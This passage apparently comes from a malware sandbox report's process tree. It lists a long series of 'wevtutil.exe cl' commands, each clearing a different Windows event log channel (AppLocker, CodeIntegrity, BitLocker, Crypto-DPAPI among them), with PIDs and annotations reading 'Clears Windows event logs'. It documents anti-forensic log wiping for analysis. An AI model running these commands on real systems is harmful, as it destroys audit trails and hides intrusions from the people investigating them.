        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
        7⤵
        
        PID:3432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
        7⤵
        
        PID:3384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IE/Diagnostic"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
        7⤵
        
        PID:3532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
        7⤵
        
        PID:2852
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
        7⤵
        
        PID:2592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
        7⤵
        
        PID:3900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
        7⤵
        
        PID:4668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
        7⤵
        
        PID:3804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
        7⤵
        
        PID:468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
        7⤵
        
        PID:3996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
        7⤵
        
        PID:3544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
        7⤵
        
        PID:1800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
        7⤵
        
        PID:472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
        7⤵
        Clears Windows event logs
        
        PID:3888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
        7⤵
        
        PID:4400
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
        7⤵
        
        PID:212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
        7⤵
        
        PID:3144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
        7⤵
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
        7⤵
        
        PID:3540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
        7⤵
        Clears Windows event logs
        
        PID:4840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
        7⤵
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
        7⤵
        
        PID:1340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
        7⤵
        
        PID:1964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
        7⤵
        
        PID:1756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
        7⤵
        
        PID:908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
        7⤵
        
        PID:1568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
        7⤵
        
        PID:5052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
        7⤵
        
        PID:3000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppSruProv"
        7⤵
        
        PID:4444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
        7⤵
        
        PID:2004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
        7⤵
        
        PID:3592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
        7⤵
        
        PID:3808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
        7⤵
        
        PID:1088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
        7⤵
        
        PID:1468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
        7⤵
        
        PID:1664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
        7⤵
        
        PID:2660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
        7⤵
        
        PID:272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        7⤵
        
        PID:288
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
        7⤵
        
        PID:3848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        7⤵
        
        PID:4904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
        7⤵
        
        PID:3720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
        7⤵
        
        PID:3348
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
        7⤵
        
        PID:3432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
        7⤵
        
        PID:2308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
        7⤵
        
        PID:2548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
        7⤵
        
        PID:4016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
        7⤵
        
        PID:4432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
        7⤵
        
        PID:1164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
        7⤵
        Clears Windows event logs
        
        PID:3900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
        7⤵
        
        PID:4668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
        7⤵
        
        PID:3804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
        7⤵
        
        PID:468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
        7⤵
        
        PID:3996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
        7⤵
        
        PID:3544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
        7⤵
        
        PID:1800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
        7⤵
        
        PID:472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
        7⤵
        
        PID:3708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
        7⤵
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
        7⤵
        
        PID:212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Backup"
        7⤵
        
        PID:3144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
        7⤵
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
        7⤵
        
        PID:3540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
        7⤵
        
        PID:4840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
        7⤵
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
        7⤵
        
        PID:1340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
        7⤵
        
        PID:1964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
        7⤵
        Clears Windows event logs
        
        PID:1756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        7⤵
        Clears Windows event logs
        
        PID:3012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
        7⤵
        
        PID:908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
        7⤵
        
        PID:5052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
        7⤵
        
        PID:3000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
        7⤵
        
        PID:4444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
        7⤵
        
        PID:2004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
        7⤵
        
        PID:3592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
        7⤵
        
        PID:2212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:4860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
        7⤵
        
        PID:2672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Call"
        7⤵
        
        PID:1468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
        7⤵
        
        PID:1664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
        7⤵
        
        PID:2660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
        7⤵
        
        PID:272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
        7⤵
        
        PID:288
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
        7⤵
        
        PID:3848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        7⤵
        
        PID:4904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
        7⤵
        
        PID:3720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        7⤵
        
        PID:3348
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
        7⤵
        
        PID:3432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
        7⤵
        
        PID:2308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
        7⤵
        
        PID:2548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
        7⤵
        
        PID:4016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
        7⤵
        
        PID:4432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
        7⤵
        
        PID:1164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
        7⤵
        
        PID:3900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
        7⤵
        
        PID:4668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
        7⤵
        
        PID:3804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
        7⤵
        
        PID:468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
        7⤵
        
        PID:3996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
        7⤵
        
        PID:3544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
        7⤵
        
        PID:1800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
        7⤵
        
        PID:472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
        7⤵
        
        PID:3708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        7⤵
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
        7⤵
        
        PID:696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
        7⤵
        
        PID:212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
        7⤵
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
        7⤵
        
        PID:3540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:4072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
        7⤵
        
        PID:3256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
        7⤵
        
        PID:1824
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
        7⤵
        
        PID:4144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
        7⤵
        
        PID:1716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
        7⤵
        
        PID:1084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
        7⤵
        
        PID:2784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
        7⤵
        
        PID:3940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:1524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
        7⤵
        
        PID:4488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
        7⤵
        
        PID:1568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
        7⤵
        
        PID:1500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
        7⤵
        
        PID:4160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
        7⤵
        
        PID:4004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
        7⤵
        
        PID:4720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
        7⤵
        
        PID:2408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
        7⤵
        
        PID:3024
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
        7⤵
        
        PID:2952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
        7⤵
        
        PID:3944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
        7⤵
        
        PID:3808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
        7⤵
        
        PID:1088
        
        C:\Windows\system32\wevtutil.exe
        
